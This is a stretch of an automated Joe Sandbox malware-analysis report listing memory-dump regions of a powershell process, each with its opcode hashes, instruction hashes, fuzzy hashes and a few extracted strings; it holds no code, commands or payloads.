                                                    • Opcode Fuzzy Hash: 87c9390967e4440159b17b4d1c1f449c3931814ad0e38553d3d3f1e9fce0c4f8
                                                    • Instruction Fuzzy Hash: 6A8168B1B00316DFDB249BA888007EBBBA3AF89210F14866BD50DEB351DA71D901C7A1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ebd9231b3230801047ab6c6b7163e2b1ed711a8550057de3d8a8456b94b7a5f
                                                    • Instruction ID: 7f4c939a3c2abf75847ee902d9301dd653592ebf4fb015ffffc349959056c23c
                                                    • Opcode Fuzzy Hash: 3ebd9231b3230801047ab6c6b7163e2b1ed711a8550057de3d8a8456b94b7a5f
                                                    • Instruction Fuzzy Hash: 79A19E74A04645CFCB05CF98C494AAAFBB1FF89310B24859AE455EB3A6C735FC51CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00e89f5be4e2b386f21cdee3432bda947fb0365b0af4a99aedbbb2e6f8f9cbc4
                                                    • Instruction ID: 06dc55c5dd5d00560dfd4ef36cfd74230aec7cc2a5f2c62e50ec1a14380a7e8e
                                                    • Opcode Fuzzy Hash: 00e89f5be4e2b386f21cdee3432bda947fb0365b0af4a99aedbbb2e6f8f9cbc4
                                                    • Instruction Fuzzy Hash: D081E234A01248DFCB15DFA4C8849ADBBF2FF89314F1984A9E405AB361CB35EC45DB51
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ef8a7fc3a3d90a02a0e8bd1f34e879674d9716f450025fd62aad02a2f4f893a
                                                    • Instruction ID: 741198b87ea89d15321f84ca4b714e91fec0968888354d95b164158aeefaa4f1
                                                    • Opcode Fuzzy Hash: 3ef8a7fc3a3d90a02a0e8bd1f34e879674d9716f450025fd62aad02a2f4f893a
                                                    • Instruction Fuzzy Hash: 21717BB1A002098FCB24DF64D884AAEBBF2FF85314F158569D4069B7A1DB74AC46CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dea17e7b9f86a26217aeb7efbc67448b170f85ab2276719c17289c797f27e04f
                                                    • Instruction ID: 617885a38110f4a5f40abfe675b7d02fe3ec86a12f6b6268b53c9a4aa41af2e1
                                                    • Opcode Fuzzy Hash: dea17e7b9f86a26217aeb7efbc67448b170f85ab2276719c17289c797f27e04f
                                                    • Instruction Fuzzy Hash: AB713CB1A00209DFDB14DFB5D454BAEBBF2BF88308F148429D502AB3A0DB75AD45CB51
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fc0221366c6cdb3e46359ef38cf2c4a7cadd3b654e8b4f6fa07102caf686d2f5
                                                    • Instruction ID: 9ac791f5f2b1becea625fe076616a84759bbe945e4fda4eb57d25462c6175a93
                                                    • Opcode Fuzzy Hash: fc0221366c6cdb3e46359ef38cf2c4a7cadd3b654e8b4f6fa07102caf686d2f5
                                                    • Instruction Fuzzy Hash: D7715AB4A00241DFD714CB98C540FBABBB2AF8A314F15C56ADA095B351DB76EC82CB81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a380751bae24c2e4300aa45eecb28d23594223e5c5e5ed6932afc82529f18105
                                                    • Instruction ID: dc85f5d2a78b8eec3d6fbd0e327fd747ced212439857de92aa0cd11468bcd3af
                                                    • Opcode Fuzzy Hash: a380751bae24c2e4300aa45eecb28d23594223e5c5e5ed6932afc82529f18105
                                                    • Instruction Fuzzy Hash: 24712A70E00219DFEB10CFA9D8447AEBBF2FF88724F148529E414A7354EB74A945CB91
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 592a6566f76f38a892e67e86ce4a8b38b631dd64788ff7c1e092721a87f00492
                                                    • Instruction ID: e3c1320bc4fe0bdd587dfc960d71ef9311f52f29c6f805d4844b10fed46f72b4
                                                    • Opcode Fuzzy Hash: 592a6566f76f38a892e67e86ce4a8b38b631dd64788ff7c1e092721a87f00492
                                                    • Instruction Fuzzy Hash: 44713B70E00219DFEB14CFA9D8447AEBBF2BF88724F148429E415A7354EB74A941CB91
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 79d5670a2ed4978b2781e0a4378eb2c0b68e332429792a2b6f56a09fa56815db
                                                    • Instruction ID: beede2c40eac0390d31010f82de808ba264e36669fa01a802628ad24a3b31e8c
                                                    • Opcode Fuzzy Hash: 79d5670a2ed4978b2781e0a4378eb2c0b68e332429792a2b6f56a09fa56815db
                                                    • Instruction Fuzzy Hash: A14126F1604212DFDB208F6984427E6B7A2DF88208B1944ABD5089B395D7B5FC81CB65
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9e2c63c8c675c375bcd84f56b5171e04c1bb7ce0b1d380fc55f5573acffc38f1
                                                    • Instruction ID: 4f16f5235231d41addfa9284ae1bbda2c43f27b0d259291257070c2ac779c7c0
                                                    • Opcode Fuzzy Hash: 9e2c63c8c675c375bcd84f56b5171e04c1bb7ce0b1d380fc55f5573acffc38f1
                                                    • Instruction Fuzzy Hash: DA4179B5B002048FDB249B74D958AAE7BF2FFC9755F054068E50AEB7A0CB35AC41DB50
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c540378b563c7ae61a24a5fa864a888b7faf5ead4c3033a182ed454b1bca2f12
                                                    • Instruction ID: 31209778db59afc24f153aa21cc0a2c2f6f88bd20b4aa4a203a4be8d002ebbb5
                                                    • Opcode Fuzzy Hash: c540378b563c7ae61a24a5fa864a888b7faf5ead4c3033a182ed454b1bca2f12
                                                    • Instruction Fuzzy Hash: 27415CB0A00209CFDB24DFB5C844BAEBBF2BF89304F148569D406AB7A4DB74AC45CB40
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4e4c8c622c5a8d07f7f6387742bf22c84d4d0120941d2f72119fe98740634a70
                                                    • Instruction ID: 1698fc04291085ec26de5b070b31e44b5dcb5f3c6667fc1546c4021252c56e7e
                                                    • Opcode Fuzzy Hash: 4e4c8c622c5a8d07f7f6387742bf22c84d4d0120941d2f72119fe98740634a70
                                                    • Instruction Fuzzy Hash: 5B412A749006059FCB05CF99C594AAAFBB1FF88310B118599E4159B3A5C732FC60CFA4
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9a5f6867b6f70c67ddb27491267a0bad071993917fdf109e0fe7e545e50042c
                                                    • Instruction ID: 2699573ef12b53d5c794e49bb379bee2c4cad9d4e5fdb4abf5992dbf5e106abd
                                                    • Opcode Fuzzy Hash: b9a5f6867b6f70c67ddb27491267a0bad071993917fdf109e0fe7e545e50042c
                                                    • Instruction Fuzzy Hash: E021BBB131430A9BEB3855A988407B7B6DB9FC9615F24853BA50DCB391DF75C8418361
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf0f3819d223737fbfcccaa1194f1fb6833ba7f269738aadf7c21710263554c3
                                                    • Instruction ID: c5ab3cd3c9af2f6c9d35b7846cf1536a5b6508a39449bce4760f5d443ebc1957
                                                    • Opcode Fuzzy Hash: bf0f3819d223737fbfcccaa1194f1fb6833ba7f269738aadf7c21710263554c3
                                                    • Instruction Fuzzy Hash: 012179B1300306DBEB2466E99800BBBB2979FC9705F24853B950ADB390DEB5D8418371
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ef71400a474f144372e7ed2129733755c2281f5f4aa76e82ac862a5be3542930
                                                    • Instruction ID: 29f30c2d23ef7a1db29b347ed7ff2742df461d7443fa638b40651478df155663
                                                    • Opcode Fuzzy Hash: ef71400a474f144372e7ed2129733755c2281f5f4aa76e82ac862a5be3542930
                                                    • Instruction Fuzzy Hash: 3D312A30B052588FCB25DB64C8946EEB7B2BF89304F1144E9D509AB355DB35EE86CF81
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 65be3f538effc744b2ced79b7ed2b1a362cf2898bd2844eb17ad892763c0e455
                                                    • Instruction ID: fd27a79928b871366311d36f15858508fef152d3e5bca511bf4a770d1156c021
                                                    • Opcode Fuzzy Hash: 65be3f538effc744b2ced79b7ed2b1a362cf2898bd2844eb17ad892763c0e455
                                                    • Instruction Fuzzy Hash: FA2178B1308385ABEB2116B588107B77FA75F8A300F2944ABD589DB3E2D6798880C331
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0fe7fece01ec20a3dd65b419cecd6c40194c2555bd671c67b63242fab337eb1f
                                                    • Instruction ID: 5d9e8f392a4e1c36c58703f3b47703fe53da5da70c5f5303ad4bdf77f1066f1d
                                                    • Opcode Fuzzy Hash: 0fe7fece01ec20a3dd65b419cecd6c40194c2555bd671c67b63242fab337eb1f
                                                    • Instruction Fuzzy Hash: FB2138B12183469FEB350AB588407B37FA79F86605F284667E54CDB3A2D7798880C322
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0c2f425ac7953f89e3356c71cbf4464994c42bb9adefc4b1632aea98d6e8e62
                                                    • Instruction ID: 76ba49827353593a9c8557e5fc96a4d7ca4cfb5c61764c6be99ebe0b7547ca6c
                                                    • Opcode Fuzzy Hash: d0c2f425ac7953f89e3356c71cbf4464994c42bb9adefc4b1632aea98d6e8e62
                                                    • Instruction Fuzzy Hash: 9301F7B63002168FD76099AAD4006BBB7979FC9632F14C53BE549C7364D672C845C7A0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d38d74bf7611732f89639c2413d878de4f938f57614bf3ffcecdac78df30872
                                                    • Instruction ID: f25931a55e50db53964ecfae703be350317cc15a3a5085f7f21d2fd5c92e0c80
                                                    • Opcode Fuzzy Hash: 5d38d74bf7611732f89639c2413d878de4f938f57614bf3ffcecdac78df30872
                                                    • Instruction Fuzzy Hash: D8119D30D04258DBEF74DE98E5887BCB7B1BF85329F14142AC051B62D0AB746889CB12
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c400211ca415a5e98832c8b66b6db0dccdc4545ebced6a238e4e9d160a64401
                                                    • Instruction ID: 57deb6f8e73e1756fc64bf224fe341de5a15edba31210b9c5ea9bd37ac5ccde6
                                                    • Opcode Fuzzy Hash: 6c400211ca415a5e98832c8b66b6db0dccdc4545ebced6a238e4e9d160a64401
                                                    • Instruction Fuzzy Hash: 19014478B402159FDB00DB98D490AADF771FF9D304B248159D95AA7361C735EC039B50
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1713949473.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_45ad000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0b511cac87b395d991d4b9a463c8c0b7ddb1ad1ac54053ae53af33ce83e76e5
                                                    • Instruction ID: 14ea86785a903fc382d2d4f6c9f43bb68b81d8367555a8e1207c13bed5e0449d
                                                    • Opcode Fuzzy Hash: d0b511cac87b395d991d4b9a463c8c0b7ddb1ad1ac54053ae53af33ce83e76e5
                                                    • Instruction Fuzzy Hash: 52012B315047409FE710AE22ED84B6FBFE8FF41324F18C41AED484B542E679A449DBB2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1713949473.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_45ad000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b073cf1bb551041676ce0fbf611983b1993d52120da1d30a923de6fedb90f38a
                                                    • Instruction ID: 58efc6bc17a1be991c9d18dda11642af1840d7116d7271893b40c77fb42966a9
                                                    • Opcode Fuzzy Hash: b073cf1bb551041676ce0fbf611983b1993d52120da1d30a923de6fedb90f38a
                                                    • Instruction Fuzzy Hash: B7019E3200E3C05FE7129B219D94B56BFB4EF53224F19C0CBD8888F5A3C2699849CB72
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 185506f38961da189fe67711f49a90ef02906846cae3605a7c7a84b28cd1278e
                                                    • Instruction ID: e71032f4ed5d43733935488daa854f9cd48461c17e0a9eb858eda11333bee955
                                                    • Opcode Fuzzy Hash: 185506f38961da189fe67711f49a90ef02906846cae3605a7c7a84b28cd1278e
                                                    • Instruction Fuzzy Hash: 7C014F35A00219DFDB14CF88D880AADF7B2FF88324B218669D819A7654C732FC51CB94
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 36b6e63dcc4c84023896cd7f0f38b5656397ebaec5376d9d9bef8e6cd4fa037a
                                                    • Instruction ID: 8cbdea2e43befa848398705bf59a1b163a67d155342a66e9c77e500bb197f615
                                                    • Opcode Fuzzy Hash: 36b6e63dcc4c84023896cd7f0f38b5656397ebaec5376d9d9bef8e6cd4fa037a
                                                    • Instruction Fuzzy Hash: E0F0A9B42093819FC3168B00C890981BFB2BF8B205B0DC0CBE2488F2A3C372D882C791
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 622278a82be5cf5240061ee2936e223a3a1d0f06fbeea7aaa19b361fe119e042
                                                    • Instruction ID: 557b0d54d2102b8299739d1b32cad46942ff2566ba487c0ccc606eac7b36eabc
                                                    • Opcode Fuzzy Hash: 622278a82be5cf5240061ee2936e223a3a1d0f06fbeea7aaa19b361fe119e042
                                                    • Instruction Fuzzy Hash: 0DE065B65092418FC7558B00C5547D1BF71BF46215F08C1CBC46C4F293C7B2D886C790
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1713949473.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_45ad000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2ee048e363195c80c60715c44b028eba2e6488c8c1f7d737eb705db5a85e74f
                                                    • Instruction ID: 3da21ac50e5c4b6e30bb0e7078c7df938de9c1b3d70e509c3a7903fb282f4556
                                                    • Opcode Fuzzy Hash: b2ee048e363195c80c60715c44b028eba2e6488c8c1f7d737eb705db5a85e74f
                                                    • Instruction Fuzzy Hash: 93218BB16043409FDB04FF10E5C0B29BB76FB84314F20C56CC80A4B641C3BAF85AC662
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 84kl$84kl$84kl$84kl
                                                    • API String ID: 0-1547189694
                                                    • Opcode ID: bd791706c4e5ae7d9802ccc97748ed2055e0592d9421dbba565d4b28d713b784
                                                    • Instruction ID: 26ce87688157bef8b1b1d04a78cc7707ad69e09bb25e7f3d167949477e80e76c
                                                    • Opcode Fuzzy Hash: bd791706c4e5ae7d9802ccc97748ed2055e0592d9421dbba565d4b28d713b784
                                                    • Instruction Fuzzy Hash: 18A1B4B1F10205DFEB249FA4C444BEBB7A2AF8D210F148466E849AB391DB75DC41CFA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml$(fml$(fml$(fml
                                                    • API String ID: 0-679830726
                                                    • Opcode ID: 72d1739c41a97b4f7c6a3cd7dda78f45c1b7405b0753f473aabdbb0cbc113762
                                                    • Instruction ID: a911564d1c12c132a530dc97ac9b99f09f60f0eb58c02f47c1ce5d12a591268f
                                                    • Opcode Fuzzy Hash: 72d1739c41a97b4f7c6a3cd7dda78f45c1b7405b0753f473aabdbb0cbc113762
                                                    • Instruction Fuzzy Hash: 8DA150F1E00205DBEB25CF94C480AAAFBB2BF8D714F14891AD8996B714D771F842CB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml$(fml$(fml$(fml
                                                    • API String ID: 0-679830726
                                                    • Opcode ID: 6484ef2a24dbd74dbd7ce9066323abc13baf9c60a69c3e9a0a9f1910f2c7b00b
                                                    • Instruction ID: 03f3433c3b8c3bef397622d0b82a9691a3c646a09959e5dbf6fb1b3442590f23
                                                    • Opcode Fuzzy Hash: 6484ef2a24dbd74dbd7ce9066323abc13baf9c60a69c3e9a0a9f1910f2c7b00b
                                                    • Instruction Fuzzy Hash: BC716CF0A00205DBEB15CF68C490BAEB7B2AF8D314F15846AD849AB751DB71EC42CF91